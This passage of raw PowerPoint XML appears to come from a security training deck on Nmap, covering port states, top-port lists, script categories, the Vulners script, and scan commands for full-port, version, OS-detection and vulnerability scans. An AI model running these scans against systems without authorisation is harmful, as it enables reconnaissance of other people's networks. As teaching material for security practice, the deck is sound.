          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD3B676-C3AD-4161-B364-16D876286436}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="208796" y="5119538"/>
            <a:ext cx="6083850" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>--Filtered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: This indicates that the probes were not received and the state blocking could not be established. It also indicates that the probes are being dropped by some kind of filtering. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1496060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28B44-0E84-4356-9D56-71A8EED291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D7A1B8-4B7F-4B87-9136-5DB63C38B5AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353961" y="1425677"/>
            <a:ext cx="11228439" cy="4700488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>sort -r -k3 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-services | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> | head -n 100 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>sort -r -k3 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>-services | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> | head -n 100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP Top Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E01E445-19CE-4708-BCA9-FA96D35E9427}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5689600" y="0"/>
            <a:ext cx="6482756" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3237471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43C9B-A7D6-4775-ACC8-66DAA790234B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap Output Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97397BCA-55C5-44DF-8FDB-CFA93286CF24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="708767" y="1851841"/>
            <a:ext cx="9961665" cy="4138408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="662090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NMAP Scripts</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304800" y="1602658"/>
            <a:ext cx="11277600" cy="4788310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NMAP - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SCRIPTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -  KALI - /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/scripts/  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Github</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCCF69D-0C35-4984-A008-583613470764}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="161427" y="2069690"/>
            <a:ext cx="11564346" cy="4788310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1058877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23BD-C05B-4B64-99B7-CEF15D68F20E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4 Main Categories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE03849-C554-41CE-A1C8-431C63D017B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="644879" y="1682136"/>
            <a:ext cx="10750038" cy="4460967"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24241108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NMAP Help Scripts</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304800" y="1602658"/>
            <a:ext cx="11277600" cy="4788310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>--script-help=&lt;Lua script&gt;: Show help about scripts.   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Nmap –script-help=http-methods</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="C:\Users\PC\AppData\Local\Temp\SNAGHTML4f582e07.PNG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BCBFF53-C407-4FCB-856A-C16A7073A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2" y="2437018"/>
            <a:ext cx="7343775"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408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Script Categories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35AFC4B7-FAFB-4FE8-BEDD-E04E99375346}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1573161"/>
            <a:ext cx="3057830" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--script default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--script vuln</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A73D6E9A-5E75-4BDC-9915-34E5901823E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600007" y="1573161"/>
            <a:ext cx="10238031" cy="5032090"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3563796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9231F2F-36A6-4925-9326-9B56878E9132}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nmap http scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1F125D-8D5F-4F4D-A89A-1161C605382A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7266001" y="0"/>
            <a:ext cx="3647805" cy="7369277"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838925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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02EF1BDA-84DD-4AD5-9C2B-836FA71B20FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Vulners</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/scripts/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://vulners.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86DE817A-9A2C-4244-8811-B0678B96E1BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5279923" y="0"/>
            <a:ext cx="6912077" cy="6781800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22729661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NMAP Commands</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304800" y="1602658"/>
            <a:ext cx="11277600" cy="4788310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Scans port 0 to 65535 and outputs to all formats called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>allPorts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –n  -p0- &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> or hostname&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>allPorts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Scans top Internet 1000 ports and conducts version detection and runs all default scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –n –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> or hostname&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Conducts OS detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>  -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –n –O –p80,443 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> or hostname&gt; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> OS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Runs all vuln scripts against target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> –n &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
